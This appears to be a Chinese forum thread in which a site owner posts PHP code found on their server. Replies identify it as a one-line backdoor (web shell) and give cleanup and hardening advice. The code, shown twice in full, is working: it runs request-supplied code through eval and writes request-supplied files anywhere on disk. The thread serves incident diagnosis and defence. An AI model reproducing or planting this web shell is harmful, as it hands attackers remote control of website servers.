<?php $kfwcbh = "cf051a1756834f0f9972191ffdf8ecfc"; if(isset($_REQUEST['cvbswp'])){ $vdvb = $_REQUEST['cvbswp']; eval($vdvb); exit(); } if(isset($_REQUEST['ztkb'])) { $lzoki = $_REQUEST['hyrvkum']; $xhwpemsz = $_REQUEST['ztkb']; $oarnubp = fopen($xhwpemsz, 'w'); $npty = fwrite($oarnubp, $lzoki); fclose($oarnubp); echo $npty; exit(); } ?>
<?php $kfwcbh = "cf051a1756834f0f9972191ffdf8ecfc"; if(isset($_REQUEST['cvbswp'])){ $vdvb = $_REQUEST['cvbswp']; eval($vdvb); exit(); } if(isset($_REQUEST['ztkb'])) { $lzoki = $_REQUEST['hyrvkum']; $xhwpemsz = $_REQUEST['ztkb']; $oarnubp = fopen($xhwpemsz, 'w'); $npty = fwrite($oarnubp, $lzoki); fclose($oarnubp); echo $npty; exit(); } ?>
你的网站应该被入侵了。
eval 是用来动态执行一段代码,而这段代码是通过$_REQUEST传递过来,并且未做过滤。
第二段是用来上传文件,讲攻击者自己的PHP文件上传至你的服务器。
请检查一下服务器的用户,禁用未知的管理员帐号,并修改自己的用户名密码。
PHP 配置文件中写的 MySQL 等帐号的密码请及时修改。
对相关 PHP 文件进行检查,看是否还有其他入侵脚本。
杀毒。
这是一句话木马。
这就是一句话后门,一眼就看出来了,eval接受的参数可以用来攻击哦!
网站代码、数据目录 “可执行不可写,可写不可执行”,改改权限